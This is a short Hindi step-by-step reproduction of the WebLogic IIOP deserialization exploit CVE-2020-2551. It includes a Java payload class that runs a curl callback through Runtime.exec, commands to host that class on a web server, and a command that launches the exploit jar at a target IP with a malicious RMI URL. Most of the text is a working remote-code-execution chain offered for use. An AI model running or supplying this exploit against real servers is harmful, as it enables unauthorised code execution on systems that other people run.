
Weblogic IIOP CVE-2020-2551
Weblogic IIOP डिसीरियलाइज़ेशन
Weblogic10.3.6+jdk1.6
पैक किया हुआ jar पैकेज एक्सट्रैक्शन कोड: a6ob
jar पैकेज डाउनलोड करें, फिर एक दुर्भावनापूर्ण RMI सेवा शुरू करने के लिए marshalsec का उपयोग करें, और स्थानीय रूप से एक exp.java कंपाइल करें।
package payload;
import java.io.IOException;
public class exp {
public exp() {
String cmd = "curl http://172.16.1.1/success";
try {
Runtime.getRuntime().exec(cmd).getInputStream();
} catch (IOException e) {
e.printStackTrace();
}
}
}
weblogic के समान JDK संस्करण और निर्भरता लाइब्रेरी (wlfullclient.jar) का उपयोग करके कंपाइल करने का प्रयास करें फिर स्थानीय रूप से एक वेब सर्वर शुरू करें।
python -m http.server --bind 0.0.0.0 80
कमांड लाइन से jar पैकेज चलाएँ
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
वास्तविक प्रभाव चित्र में दिखाया गया है

कई मित्रों का कहना है कि रीप्रोडक्शन सफल नहीं हुआ। कुछ ऑनलाइन लेख पढ़ने के बाद पाया कि IIOP में NAT मोड की समस्या है। आज पता चला कि ज़ियानज़ी पर यह उपलब्ध है: https://xz.aliyun.com/t/7498, आप सभी स्वयं वहाँ जाएँ।